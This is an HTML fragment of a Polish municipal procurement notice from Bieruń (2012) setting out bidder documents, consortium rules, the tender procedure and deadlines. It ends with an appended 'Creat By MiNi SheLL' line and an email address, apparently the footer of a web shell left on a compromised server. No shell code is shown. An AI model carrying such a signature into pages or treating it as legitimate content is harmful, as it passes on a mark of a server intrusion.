<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1)	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentów, o których mowa w punktach  3, 4 i 5 Listy wymaganych dokumentów
        przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
        zamieszkania, potwierdzające odpowiednio, że:
          a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
          b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
           albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
           płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
          c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
   Dokumenty, o których mowa powyżej, z wyjątkiem dokumentu z pkt 1b) powinny być wystawione 
   nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
          Dokument z pkt 1 b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem    
          terminu składania ofert.
          Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
          zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
          dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
          sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
          odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
          zamieszkania.
          Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1
          niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
     3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku                                  podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
     5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących   sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
     6) Podmioty występujące wspólnie
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
       spółki cywilnej) do oferty należy dołączyć : 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  jego zakresu działania i uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  
i   udzielających pełnomocnictwa, 
- 	nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- 	czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie    zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- 	cel zawarcia (wspólny udział w postępowaniu przetargowym i wspólna realizacja zamówienia publicznego),
-	datę udzielenia pełnomocnictwa,
-   podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,   
    zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
   b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                 
        o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili  łącznie.

   c)  Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Lista wymaganych dokumentów  powinny być     
       złożone   w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
       wspólnie spełnili łącznie.
       d)  Dokumenty wymienione w pkt. V B ppkt. 3,4,5 i 6 Listy wymaganych dokumentów .składa każdy                     
            z wykonawców wchodzących w skład podmiotu występującego wspólnie.
       e)  Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność z   
            oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich 
            wykonawców wchodzących w skład tego podmiotu.
        f)  Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia    
            ponoszą solidarną odpowiedzialność za wykonanie umowy.
C. Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, które zostaną 
powierzone podwykonawcom. W przypadku braku złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
1)  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
     z obowiązującą stawką; 
2)  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem  
     wymagań określonych w SIWZ, jakie osoby te powinny spełniać; 
3)  mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana       
     powszechnie obowiązujących przepisów prawa; 
4) zmiany podwykonawcy lub powierzenia podwykonawcy całego lub części zakresu zamówienia  
     w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie 
     sporządzania oferty; 
5)   innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
     wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych, pokój nr 15 , II piętro, segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - sekretariat, pokój nr 9, I piętro, segment A,
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com